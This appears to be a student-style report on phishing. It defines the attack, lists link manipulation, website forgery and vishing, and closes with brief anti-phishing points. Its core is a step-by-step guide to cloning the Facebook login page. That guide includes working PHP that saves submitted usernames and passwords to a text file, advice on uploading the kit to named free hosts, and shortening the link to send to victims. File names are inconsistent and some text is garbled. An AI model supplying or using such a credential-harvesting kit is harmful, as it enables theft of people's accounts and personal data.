TABLE OF CONTENT

WHAT IS PHISHING ??
Technique

used to steal valuable information such as credit cards numbers ,social security numbers, user IDs and passwords.

Phissing is also known as BRAND SPOOFING. The communication (usually email) directs the user to visit a Website where they are asked to update personal Information,such as passwords and credit card pin and Password , social security , and bank account numbers, that the legitimate organization already has.

THE SIMPLIFIED STEPS OF PHISHING :

1. A deceptive message is sent from the Phishers to the user. 2. A user provides confidential information to a Phishing Server (normally after some interaction with the server).

3. The Phishers obtains the confidential information from the server.

HOW PHISHING WORKS ?

Phishing link takes user to fake web page which looks like genuine.

TYPES OF PHISHING ATTACKS :

Phishers use a wide variety of techniques, with one common thread 1. LINK MANIPULATION

2. WEBSITE FORGERY
3. PHONE PHISHING

LINK MANIPULATION
By manipulating the links for example

www.faceb00k.com
instead of

www.facebook.com
Mis-spelled URLs or the use of sub domains are common tricks used by Phishers

WEBSITE FORGERY :

The hacker need to Generate duplicate Address Bar using some java Scripts. Using Java-scripts the original URL is Hidden and the Duplicate Phishers duplicate URL is displayed in the address bar. Using modified Address bar User Thinks That the URL is a Genuine URL and user Provides some private informations Like Login-ID , passwords , Pin-no. to The Attacker.

Above is the Website of the citi bank having fake Address bar.

PHONE PHISHING
Not All phishing Attacks Require Fake Website . Some message is Claimed to Bank user Telling User That There is a Some Problem With Phone Account And advised to dial some number which Looks like owned by bank but actualy It is owned by Attackers. The attackers use Fake Caller ID to call the user so user thins that the Call is From trusted organization.

The User Dials That number And recorded message played and tells User To enter Bank Account number and password .
Phone Phishing is also refered as Voice phishing or we can say VISHING

EXAMPLE OF PHISHING ATTACKS

WWW.FACEBOOK.COM

Step 1:
Go to facebook.com Right click on the white space of the front page. Select "View Page source". Copy the code to Notepad. OR

Click View source From The Toolbar.

After clicking on the source You will find HTML code of The Facebook.com U just need to copy that code into the notepad File.

Step2:
Now find (Press ctrl +f) for "action=" in that code. You fill find the code like this:

 By Default in Code The Action= Redirects us to the original facebook login page. U will find like
Action= https://www.facebook.com/login.php

To Divert the Flow of That Data From original Facebook site to Hacker. U have to redirect the action to another file let us say

Action=next.php Next.php is another file which is created by the hacker to Store the user id and passwords submited by a Victim.

Step 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code: <?php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> save this file as "next.php".

Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents. Now upload those three files(namely index . html, next.php ,passwords.txt) in any of domain using free Web hosting site. There are so many free web hosting sites which provides free domain to the user. Some free webhosting sites are : 000webhost.com Freehostingforu.com 360gb.com Host1free.com

EASY STEPS TO CREATE FREE WEB HOSTING SITE

Step 1 :
Redirect to any of the free web hosting site. And Sign-up.

Step 2 : After completing the Sign-up process u will get domain and password Through Email. Log-in using That Email Id and passwords.

Step 3 : After Login You will get the Control panel for your domain. In control panel click on File manager opton and upload all the 3 files Which is required for phishing site.

index.php next.php

: For loading Facebook Login page : To divert information to hacker when user clicks on Login button

password.php

: For storing the ID and passwords of Victim.

Now you are done with phishing the facebook site. You just need to create a tiny url of your free hosting website domain using www.tinyurl.com .

ne

You just need to copy and paste the tiny URL link to the victim.

WWW.CRUSHBITS.COM
Fraud Sites Like www.crushbits.com is used to make peoples fool or Used to play prank with friends. Below is the crushbits sign-up Page.

After completing Sign-up process u will get a URL to Your Given Email ID.

When You Give This URL To your Friends using sms or email or Chatbox they will be Redirected to The Following page.

Phishing Site will Ask User for Crush And however user enters the Crush however user enters the crush and clicks on Click to find out button They will get display that You have been Fooled.

However Attacker logins into their account they will notified about All the victims with their crushes.

ANTI PHISHING TECHNIQUES

Anti phishing techniques are techniques to prevent phishing attacks. The anti phishing techniques can in general be divided into three categories.

1. SPAM FILTERS 2. ANTI-PHISHING TOOL BARS AND 3. PASSWORD PROTECTION MECHANISM

ADVANTAGES OF ANTI-PHISHING :

Protect you from Phishing attacks.

When a Phishing website or phishing email appears it will informs to the user. Some Anti-Phishing software's also allows seeing the hosting location and Risk Rating of every site you visit.

DISADVANTAGES OF ANTI-PHISHING :
No single technology will completely stop phishing. So Phishing attacks can not be completely stopped Even Anti-Phishing software's should be upgraded with respect to the Phishing attacks.